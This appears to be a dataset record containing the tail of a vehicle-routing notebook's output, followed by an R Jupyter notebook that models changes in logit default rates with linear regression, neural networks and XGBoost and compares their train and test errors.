63312 -> 60021 -> 60038 -> END\nDistance of the route: 257m\n\nRoute for vehicle 151:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 152:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 153:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 154:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 155:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 156:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 157:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 158:\nSTART -> 42686 -> 46969 -> 46594 -> 62686 -> 66594 -> 66969 -> END\nDistance of the route: 211m\n\nRoute for vehicle 159:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 160:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 161:\nSTART -> 40076 -> 60076 -> END\nDistance of the route: 127m\n\nRoute for vehicle 162:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 163:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 164:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 165:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 166:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 167:\nSTART -> 44301 -> 43870 -> 45773 -> 64301 -> 65773 -> 63870 -> END\nDistance of the route: 235m\n\nRoute for vehicle 168:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 169:\nSTART -> 43021 -> 63021 -> END\nDistance of the route: 96m\n\nRoute for vehicle 170:\nSTART -> 40149 -> 43277 -> 60149 -> 43971 -> 63277 -> 63971 -> END\nDistance of the route: 255m\n\nRoute for vehicle 171:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 172:\nSTART -> 45609 -> 41815 -> 45160 -> 61815 -> 65609 -> 65160 -> END\nDistance of the route: 160m\n\nRoute for vehicle 173:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 174:\nSTART -> 45112 -> 41308 -> 41766 -> 61766 -> 61308 -> 44114 -> 65112 -> 64114 -> END\nDistance of the route: 209m\n\nRoute for vehicle 175:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 176:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 177:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 178:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 179:\nSTART -> 41313 -> 41438 -> 61313 -> 61438 -> END\nDistance of the route: 153m\n\nRoute for vehicle 180:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 181:\nSTART -> 42880 -> 62880 -> END\nDistance of the route: 85m\n"
],
[
"try:\n out = subprocess.check_output([\"python3\", \"check.py\", DATA_IN_PATH, DATA_OUT_PATH]).decode(\"ascii\")\n out_profit = int(out[out.find(\"Profit: \") + 8:])\n \n print(\"Profit:\", out_profit)\n\n if out_profit < 0:\n with open(DATA_OUT_PATH, \"w\") as out:\n out.write(dumps([]))\n print(\"Rewritten.\")\nexcept Exception as ex:\n print(\"Test failed:\\n\", ex)",
"Profit: 10113\n"
]
],
[
[
"# Profits\n\n### Example\nExample: 2438 \nNo clustering / depots: **2498** \n\n### Simple\nExample: 1380 \nNo clustering / depots: **1596** \n\n### Hard\nNo clustering / depots: **1952**",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
e7080b116854ee8cdc474e83b6194c3294f92cf5 | 386,047 | ipynb | Jupyter Notebook | 2a_R_models.ipynb | uhoenig/Default-Modelling | 4bdc0984bda97b84effcdac5ed1aa8bcf94eea21 | [
"MIT"
] | null | null | null | 2a_R_models.ipynb | uhoenig/Default-Modelling | 4bdc0984bda97b84effcdac5ed1aa8bcf94eea21 | [
"MIT"
] | null | null | null | 2a_R_models.ipynb | uhoenig/Default-Modelling | 4bdc0984bda97b84effcdac5ed1aa8bcf94eea21 | [
"MIT"
] | null | null | null | 204.799469 | 53,731 | 0.886182 | [
[
[
"# Macroeconomic default modelling - a Machine Learning approach\n\n### PART 3a",
"_____no_output_____"
],
[
"### Outline of the script(s)\n- Creating the Analytic Base Table (ABT) + Exploratory Data Analysis _(0 ABT.ipynb)_\n\n\n- Preprocessing the Dataset _(1 Preprocessing.ipynb)_\n\n\n__ Modelling changes in the default rate__ _(This Notebook)_",
"_____no_output_____"
],
[
"### First, let's load (and install where neccessary) the packages that we are using",
"_____no_output_____"
]
],
[
[
"### Load packages (and install the ones missing)\nsuppressMessages(if (!require(\"pacman\")) install.packages(\"pacman\", repos = \"http://cran.us.r-project.org\"))\n#devtools::install_github(\"business-science/alphavantager\")\n#devtools::install_github(\"business-science/tidyquant\")\n#install.packages(\"tidyquant\")\npacman::p_load(\"readxl\",\"Hmisc\",\"mice\",\n \"VIM\",\"car\",\"Amelia\", \"IRdisplay\",\n \"ggplot2\", \"dplyr\", \"caret\", \"broom\",\n \"tibble\",\"labeling\", \"digest\", \"tseries\", \n \"mombf\", \"robustbase\",\"forecast\", \"caTools\",\n \"mlbench\", \"party\", \"rpart\", \"e1071\", \"cluster\",\n \"randomForest\", \"gbm\", \"xgboost\", \"h2o\", \"timetk\",\n \"tidyquant\", \"nnet\", \"ggfortify\", \"DAAG\", \"neuralnet\")#add more packages here if needed!",
"_____no_output_____"
]
],
[
[
"### Let's get all our transformed train and test dataset (For delta-Logit PD and delta-Logit AR)",
"_____no_output_____"
]
],
[
[
"#Find a more clever way to retrieve multiple .csv later :)\n#Reminder: y_train_PD is supposed to be the delta-logit-PD (check 1_Processing script how that came about)\n#Reminder2: y_train_AR is supposed to be the delta-logit-AR (check 1_Processing script how that came about)\ndocument_name = \"ABT_train_PD\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_train_PD <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_train_PD <- as.data.frame(ABT_train_PD)\nABT_train_PD$Date = as.Date(as.character(ABT_train_PD$Date), \"%Y-%m-%d\")\n####################################################################\ndocument_name = \"ABT_train_AR\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_train_AR <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_train_AR <- as.data.frame(ABT_train_AR)\nABT_train_AR$Date = as.Date(as.character(ABT_train_AR$Date), \"%Y-%m-%d\")\n####################################################################\ndocument_name = \"ABT_test_PD\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_test_PD <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_test_PD <- as.data.frame(ABT_test_PD)\nABT_test_PD$Date = as.Date(as.character(ABT_test_PD$Date), \"%Y-%m-%d\")\n####################################################################\ndocument_name = \"ABT_test_AR\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_test_AR <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_test_AR <- as.data.frame(ABT_test_AR)\nABT_test_AR$Date = as.Date(as.character(ABT_test_AR$Date), \"%Y-%m-%d\")",
"_____no_output_____"
]
],
[
[
"## Modeling Part\n\n### How to know if the model is best fit for your data?",
"_____no_output_____"
]
],
[
[
"document_name = \"measures.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"## 1. Naive Model (This will be our benchmark)\n\n- Always start with a Naive Approach to get the baseline error that you can measure up against future models\n\n- Last observation carrying forward as prediction (Reason: if no indication on trend available, take the last obs, as it contains most information that you can act upon",
"_____no_output_____"
]
],
[
[
"cat(\"Baseline RMSE train error for Delta-Logit-PD:\", round(sqrt(mean(diff(ABT_train_PD$y_train_PD)^2)),4), \"\\n\")\ncat(\"Baseline MAE train error for Delta-Logit-PD: \", round((mean(abs(diff(ABT_train_PD$y_train_PD)))),4), \"\\n\",\"\\n\")\ncat(\"Baseline RMSE test error for Delta-Logit-PD:\", round(sqrt(mean(diff(ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"Baseline MAE test error for Delta-Logit-PD: \", round((mean(abs(diff(ABT_test_PD$y_test_PD)))),4), \"\\n\",\"\\n\")\n\ncat(\"And now for the Delta-Logit-AR:\",\"\\n\",\"\\n\")\n\ncat(\"Baseline RMSE train error for Delta-Logit-AR:\", round(sqrt(mean(diff(ABT_train_AR$y_train_AR)^2)),4), \"\\n\")\ncat(\"Baseline MAE train error for Delta-Logit-AR: \", round((mean(abs(diff(ABT_train_AR$y_train_AR)))),4), \"\\n\",\"\\n\")\n\ncat(\"Baseline RMSE test error for Delta-Logit-AR:\", round(sqrt(mean(diff(ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"Baseline MAE test error for Delta-Logit-AR: \", round((mean(abs(diff(ABT_test_AR$y_test_AR)))),4), \"\\n\",\"\\n\")",
"Baseline RMSE train error for Delta-Logit-PD: 0.0335 \nBaseline MAE train error for Delta-Logit-PD: 0.0274 \n \nBaseline RMSE test error for Delta-Logit-PD: 0.0094 \nBaseline MAE test error for Delta-Logit-PD: 0.0078 \n \nAnd now for the Delta-Logit-AR: \n \nBaseline RMSE train error for Delta-Logit-AR: 0.1933 \nBaseline MAE train error for Delta-Logit-AR: 0.1245 \n \nBaseline RMSE test error for Delta-Logit-AR: 0.4798 \nBaseline MAE test error for Delta-Logit-AR: 0.2955 \n \n"
]
],
[
[
"### Conclusion: \n\n- As we can observe the errors are quite small for the Delta-Logit-PD Forecast\n\n\n- This indicates that a autoregressive model should be suitable (at least it tells us that past values have some for of indication)\n\n",
"_____no_output_____"
],
[
"## 2. Linear Regression\n\nThe aim of linear regression is to model a continuous variable $Y$ as a mathematical function of one or more $X$ variable(s), so that we can use this regression model to predict the Y when only the X is known. This mathematical equation can be generalized as follows:\n\n$$Y = \\beta_1 + \\beta_2 \\cdot X +\\epsilon$$\n\nwhere, $\\beta_1$ is the intercept and $\\beta_2$ is the slope. Collectively, they are called regression coefficients. $\\epsilon$ is the error term, the part of $Y$ the regression model is unable to explain.",
"_____no_output_____"
]
],
[
[
"document_name = \"LinearReg.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"### The p Value: Checking for statistical significance\n\nThe summary statistics above tells us a number of things. One of them is the model p-Value (bottom last line) and the p-Value of individual predictor variables (extreme right column under ‘Coefficients’). The p-Values are very important because, We can consider a linear model to be statistically significant only when both these p-Values are less that the pre-determined statistical significance level, which is ideally 0.05. This is visually interpreted by the significance stars at the end of the row. The more the stars beside the variable’s p-Value, the more significant the variable.\n\nNull and alternate hypothesis\nWhen there is a p-value, there is a hull and alternative hypothesis associated with it. In Linear Regression, the Null Hypothesis is that the coefficients associated with the variables is equal to zero. The alternate hypothesis is that the coefficients are not equal to zero (i.e. there exists a relationship between the independent variable in question and the dependent variable).\n\n\n### R-Squared and Adj R-Squared\n\nWhat R-Squared tells us is the proportion of variation in the dependent (response) variable that has been explained by this model.\n\n$$R^2 = 1- \\frac{\\sum_{i=1}^n (y_i - \\hat{y}_i)^2}{\\sum_{i=1}^n (y_i - \\bar{y}_i)^2}$$\n\ni.e. the ratio between sum of _squared errors_ and _sum of squared total_\n\n__Now thats about R-Squared. What about adjusted R-Squared?__ \n\nAs you add more X variables to your model, the R-Squared value of the new bigger model will always be greater than that of the smaller subset. This is because, since all the variables in the original model is also present, their contribution to explain the dependent variable will be present in the super-set as well, therefore, whatever new variable we add can only add (if not significantly) to the variation that was already explained. It is here, the adjusted R-Squared value comes to help. Adj R-Squared penalizes total value for the number of terms (read predictors) in your model. Therefore when comparing nested models, it is a good practice to look at adj-R-squared value over R-squared.\n\n$$R_{adj}^2 = 1- \\bigg(\\frac{(1-R^2)(n-1)}{n-q}\\bigg)$$\n\nWe don’t necessarily discard a model based on a low R-Squared value. Its a better practice to look at the AIC and prediction accuracy on validation sample when deciding on the efficacy of a model.\n\n\nwhere $n$ is the number of observations and $q$ is the number of coefficients in the model\n\n\n__MinMaxAccuracy__\n\n$$\\text{MinMaxAccuracy} = \\text{mean}\\bigg(\\frac{\\min(actuals, predicted)}{\\max(actuals, predicted)}\\bigg)$$\n\n\n__MeanAbsolutePercentageError (MAPE)__\n\n\n$$\\text{MAPE} = \\text{mean}\\bigg(\\frac{\\text{abs}(predicted-actuals)}{actuals}\\bigg)$$\n\n\n- Note: The MAPE can only be computed with respect to data that are guaranteed to be strictly positive, \n- so if this statistic is missing from your output where you would normally expect to see it,\n- it’s possible that it has been suppressed due to negative data values.\n\n\n__AIC and BIC__\n\nThe Akaike’s information criterion - AIC (Akaike, 1974) and the Bayesian information criterion - BIC (Schwarz, 1978) are measures of the goodness of fit of an estimated statistical model and can also be used for model selection. Both criteria depend on the maximized value of the likelihood function L for the estimated model.\n\n\n__For model comparison, the model with the lowest AIC and BIC score is preferred.__",
"_____no_output_____"
],
[
"### We train our linear model on the train dataset",
"_____no_output_____"
]
],
[
[
"linearMod_PD <- lm(y_train_PD ~ ., data=ABT_train_PD[,-1]) #remove the Date column, as it's obviously not a predictor\nlinearMod_AR <- lm(y_train_AR ~ ., data=ABT_train_AR[,-1]) #remove the Date column, as it's obviously not a predictor",
"_____no_output_____"
]
],
[
[
"### Let's investigate on some diagnostic measures.",
"_____no_output_____"
]
],
[
[
"summary(linearMod_PD)\ncat(\"####################And here below the summary for Delta-Logit-AR:#######################\",\"\\n\")\nsummary(linearMod_AR)",
"_____no_output_____"
],
[
"cat(\"The Akaike Information Criterion Score is:\", AIC(linearMod_PD),\"\\n\")\ncat(\"The Bayesian Information Criterion Score is:\", BIC(linearMod_PD),\"\\n\")\ncat(\"The Akaike Information Criterion Score is:\", AIC(linearMod_AR),\"\\n\")\ncat(\"The Bayesian Information Criterion Score is:\", BIC(linearMod_AR),\"\\n\")",
"The Akaike Information Criterion Score is: -186.5008457 \nThe Bayesian Information Criterion Score is: -162.2492269 \nThe Akaike Information Criterion Score is: -66.63523954 \nThe Bayesian Information Criterion Score is: -42.38362073 \n"
]
],
[
[
"### For assessing the appropriatness of a linear model, let's also look at \n\n- Residual vs Fitted plot\n- Normal Q-Q plot ",
"_____no_output_____"
]
],
[
[
"autoplot(linearMod_PD)",
"_____no_output_____"
],
[
"cat(\"#################And now the results for the Delta_logit-AR######################\",\"\\n\")\nautoplot(linearMod_AR)",
"#################And now the results for the Delta_logit-AR###################### \n"
]
],
[
[
"### Let's look at the train error:",
"_____no_output_____"
]
],
[
[
"cat(\"RMSE train error for Delta-Logit-PD:\", round(sqrt(mean((linearMod_PD$residuals)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-PD: \", round((mean(abs(linearMod_PD$residuals))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE train error for Delta-Logit-AR:\", round(sqrt(mean((linearMod_AR$residuals)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-AR: \", round((mean(abs(linearMod_AR$residuals))),4), \"\\n\",\"\\n\")",
"RMSE train error for Delta-Logit-PD: 0.0511 \nMAE train error for Delta-Logit-PD: 0.0409 \n \nRMSE train error for Delta-Logit-AR: 0.1249 \nMAE train error for Delta-Logit-AR: 0.0776 \n \n"
]
],
[
[
"## Conclusion\n\n- The p-value of the model is significant\n\n- The Adj. R^2 seems quite large\n\n- Most features are significant as well\n\n__BUT__\n\n- The linear model for Delta-Logit-PD performs worse in train as our baseline\n\n- The linear model for Delta-Logit-AR is not suitable at all- however, it provides a better score than the benchmark",
"_____no_output_____"
],
[
"## Predicting Linear Models",
"_____no_output_____"
]
],
[
[
"test_predictions_PD = predict(linearMod_PD, ABT_test_PD%>%select(-Date, -y_test_PD))\ntest_predictions_AR = predict(linearMod_AR, ABT_test_AR%>%select(-Date, -y_test_AR))",
"_____no_output_____"
]
],
[
[
"### Calculate prediction accuracy and error rates : Let's look at the test error",
"_____no_output_____"
]
],
[
[
"cat(\"RMSE test error for Delta-Logit-PD:\", round(sqrt(mean((test_predictions_PD - ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-PD: \", round((mean(abs(test_predictions_PD - ABT_test_PD$y_test_PD))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE test error for Delta-Logit-AR:\", round(sqrt(mean((test_predictions_AR - ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-AR: \", round((mean(abs(test_predictions_AR - ABT_test_AR$y_test_AR))),4), \"\\n\",\"\\n\")\n",
"RMSE test error for Delta-Logit-PD: 0.0757 \nMAE test error for Delta-Logit-PD: 0.0658 \n \nRMSE test error for Delta-Logit-AR: 0.3889 \nMAE test error for Delta-Logit-AR: 0.279 \n \n"
]
],
[
[
"- A simple correlation between the actuals and predicted values can be used as a form of accuracy measure.\n\n\n- A higher correlation accuracy implies that the actuals and predicted values have similar directional movement, i.e. when the actuals values increase the predicteds also increase and vice-versa.",
"_____no_output_____"
],
[
"## Conclusion about Linear Regression (tbd)",
"_____no_output_____"
],
[
"## 3. Neural Net\n\n### Introduction\n\nNeural network is an information-processing machine and can be viewed as analogous to human nervous system. Just like human nervous system, which is made up of interconnected neurons, a neural network is made up of interconnected information processing units. The information processing units do not work in a linear manner. In fact, neural network draws its strength from parallel processing of information, which allows it to deal with non-linearity. Neural network becomes handy to infer meaning and detect patterns from complex data sets.\n\nNeural network is considered as one of the most useful technique in the world of data analytics. However, it is complex and is often regarded as a black box, i.e. users view the input and output of a neural network but remain clueless about the knowledge generating process. We hope that the article will help readers learn about the internal mechanism of a neural network and get hands-on experience to implement it in R.",
"_____no_output_____"
],
[
"### The Basics of Neural Network\n\nA neural network is a model characterized by an activation function, which is used by interconnected information processing units to transform input into output. A neural network has always been compared to human nervous system. Information in passed through interconnected units analogous to information passage through neurons in humans. The first layer of the neural network receives the raw input, processes it and passes the processed information to the hidden layers. The hidden layer passes the information to the last layer, which produces the output. The advantage of neural network is that it is adaptive in nature. It learns from the information provided, i.e. trains itself from the data, which has a known outcome and optimizes its weights for a better prediction in situations with unknown outcome.\n\nA perceptron, viz. single layer neural network, is the most basic form of a neural network. A perceptron receives multidimensional input and processes it using a weighted summation and an activation function. It is trained using a labeled data and learning algorithm that optimize the weights in the summation processor. A major limitation of perceptron model is its inability to deal with non-linearity. A multilayered neural network overcomes this limitation and helps solve non-linear problems. The input layer connects with hidden layer, which in turn connects to the output layer. The connections are weighted and weights are optimized using a learning rule.\n\nThere are many learning rules that are used with neural network:\n\na) least mean square\n\nb) gradient descent;\n\nc) newton’s rule;\n\nd) conjugate gradient etc.\n\nThe learning rules can be used in conjunction with backpropgation error method. The learning rule is used to calculate the error at the output unit. This error is backpropagated to all the units such that the error at each unit is proportional to the contribution of that unit towards total error at the output unit. The errors at each unit are then used to optimize the weight at each connection. Figure 1 displays the structure of a simple neural network model for better understanding.",
"_____no_output_____"
]
],
[
[
"document_name = \"nnet.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
],
[
"# fit neural network #develop flexible formula later!\nset.seed(2)\nNN_PD = neuralnet(y_train_PD ~ PC1+PC2+PC3+PC4+PC5+PC6+PC7+PC8+PC9, ABT_train_PD%>%select(-Date), hidden = 2 , linear.output = T )\nNN_AR = neuralnet(y_train_AR ~ PC1+PC2+PC3+PC4+PC5+PC6+PC7+PC8+PC9, ABT_train_AR%>%select(-Date), hidden = 2, linear.output = T )\n\n# plot neural network (import picture from R-studio... figure out why doesn't work in jupyter notebook!)\nplot(NN_PD)\nplot(NN_AR)\n",
"_____no_output_____"
],
[
"document_name = \"NN_PD.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"- The black lines show the connections between each layer and the weights on each connection while the blue lines show the bias term added in each step. The bias can be thought as the intercept of a linear model.\n\n\n- The net is essentially a black box so we cannot say that much about the fitting, the weights and the model. \n\n\n- Suffice to say that the training algorithm has converged and therefore the model is ready to be used.",
"_____no_output_____"
]
],
[
[
"document_name = \"NN_AR.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"### Error analysis - Let's look at the train error:\n\n",
"_____no_output_____"
]
],
[
[
"NN_PD_pred = as.vector(NN_PD$net.result[[1]]) #retrieve the y_hat valeus\nNN_AR_pred = as.vector(NN_AR$net.result[[1]])\n\ncat(\"RMSE train error for Delta-Logit-PD:\", round(sqrt(mean((NN_PD_pred-ABT_train_PD$y_train_PD)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-PD: \", round((mean(abs(NN_PD_pred-ABT_train_PD$y_train_PD))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE train error for Delta-Logit-AR:\", round(sqrt(mean((NN_AR_pred-ABT_train_AR$y_train_AR)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-AR: \", round((mean(abs(NN_AR_pred-ABT_train_AR$y_train_AR))),4), \"\\n\",\"\\n\")",
"RMSE train error for Delta-Logit-PD: 0.0345 \nMAE train error for Delta-Logit-PD: 0.0274 \n \nRMSE train error for Delta-Logit-AR: 0.1119 \nMAE train error for Delta-Logit-AR: 0.0725 \n \n"
]
],
[
[
"## Prediction using neural network",
"_____no_output_____"
]
],
[
[
"NN_PD_test <- compute(NN_PD,ABT_test_PD%>%select(-Date,-y_test_PD))\nNN_AR_test <- compute(NN_AR,ABT_test_AR%>%select(-Date,-y_test_AR))",
"_____no_output_____"
]
],
[
[
"### Let's look at the test error:\n",
"_____no_output_____"
]
],
[
[
"NN_PD_test_pred = as.vector(NN_PD_test$net.result) #retrieve the y_hat valeus\nNN_AR_test_pred = as.vector(NN_AR_test$net.result)\n\ncat(\"RMSE test error for Delta-Logit-PD:\", round(sqrt(mean((NN_PD_test_pred-ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-PD: \", round((mean(abs(NN_PD_test_pred-ABT_test_PD$y_test_PD))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE test error for Delta-Logit-AR:\", round(sqrt(mean((NN_AR_test_pred-ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-AR: \", round((mean(abs(NN_AR_test_pred-ABT_test_AR$y_test_AR))),4), \"\\n\",\"\\n\")",
"RMSE test error for Delta-Logit-PD: 0.0541 \nMAE test error for Delta-Logit-PD: 0.0444 \n \nRMSE test error for Delta-Logit-AR: 0.4162 \nMAE test error for Delta-Logit-AR: 0.2921 \n \n"
]
],
[
[
"### A first visual approach to the performance of the network and the linear model on the test set is plotted below",
"_____no_output_____"
]
],
[
[
"par(mfrow=c(2,1))\nplot(ABT_train_PD$y_train_PD,NN_PD_pred,col='red',\n main='Real vs predicted NN (train set) Delta-Logit PD',pch=18,cex=0.7, ylab = \"NN predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_train',pch=18,col='red', bty='n')\nplot(ABT_test_PD$y_test_PD, NN_PD_test_pred,col='blue',\n main='Real vs predicted NN (test set) Delta-Logit PD',pch=18, cex=0.7, ylab = \"NN predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_test',pch=18,col='blue', bty='n', cex=.95)\n",
"_____no_output_____"
],
[
"par(mfrow=c(2,1))\nplot(ABT_train_AR$y_train_AR,NN_AR_pred,col='red',\n main='Real vs predicted NN (train set) Delta-Logit AR',pch=18,cex=0.7, ylab = \"NN predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_train',pch=18,col='red', bty='n')\nplot(ABT_test_AR$y_test_AR,NN_AR_test_pred,col='blue',\n main='Real vs predicted NN (test set) Delta-Logit AR',pch=18, cex=0.7, ylab = \"NN predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='NN_test',pch=18,col='blue', bty='n', cex=.95)",
"_____no_output_____"
]
],
[
[
"## the non-linear model for Delta-Logit-AR performs better than simply Linear Regression",
"_____no_output_____"
]
],
[
[
"mygrid <- expand.grid(.decay=c(0.5, 0.1), .size=c(1,2,3,4,5,6,7,8,9))#9features\nnnetfit <- train(y_train_AR ~ ., data=ABT_train_AR[,-1], method=\"nnet\", maxit=200, tuneGrid=mygrid, trace=F) \nprint(nnetfit)\n\n# in contrast\n\nlmfit <- train(y_train_AR ~ ., data=ABT_train_AR[,-1], method=\"lm\") \nprint(lmfit)",
"Neural Network \n\n67 samples\n 9 predictor\n\nNo pre-processing\nResampling: Bootstrapped (25 reps) \nSummary of sample sizes: 67, 67, 67, 67, 67, 67, ... \nResampling results across tuning parameters:\n\n decay size RMSE Rsquared MAE \n 0.1 1 0.1502760670 0.2975009127 0.10420669619\n 0.1 2 0.1484386750 0.2893067690 0.10287315283\n 0.1 3 0.1472826165 0.2899906728 0.10151445190\n 0.1 4 0.1462416662 0.2930703635 0.10047461087\n 0.1 5 0.1452379736 0.2986082215 0.09936393948\n 0.1 6 0.1444220741 0.3031443486 0.09854671435\n 0.1 7 0.1438096622 0.3074205280 0.09788322264\n 0.1 8 0.1432838718 0.3111209466 0.09732003799\n 0.1 9 0.1426325800 0.3154283046 0.09669090421\n 0.5 1 0.1745207195 0.3411645230 0.13373212346\n 0.5 2 0.1685845404 0.3434214571 0.12786938729\n 0.5 3 0.1648154703 0.3442762477 0.12368117712\n 0.5 4 0.1620111697 0.3450665295 0.12033264538\n 0.5 5 0.1598175517 0.3455819588 0.11761134813\n 0.5 6 0.1580492042 0.3460236928 0.11545337509\n 0.5 7 0.1565959534 0.3463774237 0.11370501675\n 0.5 8 0.1553843817 0.3466584685 0.11224455547\n 0.5 9 0.1543646567 0.3468555700 0.11100457462\n\nRMSE was used to select the optimal model using the smallest value.\nThe final values used for the model were size = 9 and decay = 0.1.\nLinear Regression \n\n67 samples\n 9 predictor\n\nNo pre-processing\nResampling: Bootstrapped (25 reps) \nSummary of sample sizes: 67, 67, 67, 67, 67, 67, ... \nResampling results:\n\n RMSE Rsquared MAE \n 0.1577663285 0.2027322481 0.1099471409\n\nTuning parameter 'intercept' was held constant at a value of TRUE\n"
]
],
[
[
"## Let's try out more heavy machinery",
"_____no_output_____"
],
[
"## XGBoost",
"_____no_output_____"
]
],
[
[
"TrainControl <- trainControl( method = \"repeatedcv\", number = 5, repeats = 4)\n\nmodel_PD<- train(y_train_PD ~ ., data=ABT_train_PD[,-1], method = \"xgbLinear\", trControl = TrainControl,verbose = FALSE)\n\nmodel_AR<- train(y_train_AR ~ ., data=ABT_train_AR[,-1], method = \"xgbLinear\", trControl = TrainControl,verbose = FALSE)",
"_____no_output_____"
],
[
"predicted_train_PD = predict(model_PD)\npredicted_train_AR = predict(model_AR)\n\ncat(\"RMSE_train error for Delta-Logit PD:\", round(sqrt(mean((predicted_train_PD - ABT_train_PD$y_train_PD)^2)),4), \"\\n\")\ncat(\"MAE_train error for Delta-Logit PD:\", round((mean(abs(predicted_train_PD - ABT_train_PD$y_train_PD))),4), \"\\n\",\"\\n\")\n\n\ncat(\"RMSE_train error for Delta-Logit AR:\", round(sqrt(mean((predicted_train_AR - ABT_train_AR$y_train_AR)^2)),4), \"\\n\")\ncat(\"MAE_train error for Delta-Logit AR: \", round((mean(abs(predicted_train_AR - ABT_train_AR$y_train_AR))),4), \"\\n\",\"\\n\")\n\npredicted_test_PD <- predict(model_PD, ABT_test_PD%>%select(-Date,-y_test_PD))\ncat(\"RMSE_test error for Delta-Logit PD: \", round(sqrt(mean((predicted_test_PD - ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"MAE_test error for Delta-Logit PD: \", round((mean(abs(predicted_test_PD - ABT_test_PD$y_test_PD))),4), \"\\n\", \"\\n\")\n\n\npredicted_test_AR <- predict(model_AR, ABT_test_AR%>%select(-Date,-y_test_AR))\ncat(\"RMSE_test error for Delta-Logit AR: \", round(sqrt(mean((predicted_test_AR - ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"MAE_test error for Delta-Logit AR: \", round((mean(abs(predicted_test_AR - ABT_test_AR$y_test_AR))),4), \"\\n\", \"\\n\")\n",
"RMSE_train error for Delta-Logit PD: 0.0108 \nMAE_train error for Delta-Logit PD: 0.007 \n \nRMSE_train error for Delta-Logit AR: 0.0147 \nMAE_train error for Delta-Logit AR: 0.009 \n \nRMSE_test error for Delta-Logit PD: 0.067 \nMAE_test error for Delta-Logit PD: 0.0598 \n \nRMSE_test error for Delta-Logit AR: 0.3666 \nMAE_test error for Delta-Logit AR: 0.2472 \n \n"
],
[
"par(mfrow=c(2,1))\nplot(ABT_train_PD$y_train_PD,predicted_train_PD,col='red',\n main='Real vs predicted XGBoost (train set) Delta-Logit PD',pch=18,cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGBoost_train',pch=18,col='red', bty='n')\nplot(ABT_test_PD$y_test_PD, predicted_test_PD,col='blue',\n main='Real vs predicted XGBoost (test set) Delta-Logit PD',pch=18, cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGboost_test',pch=18,col='blue', bty='n', cex=.95)\n",
"_____no_output_____"
],
[
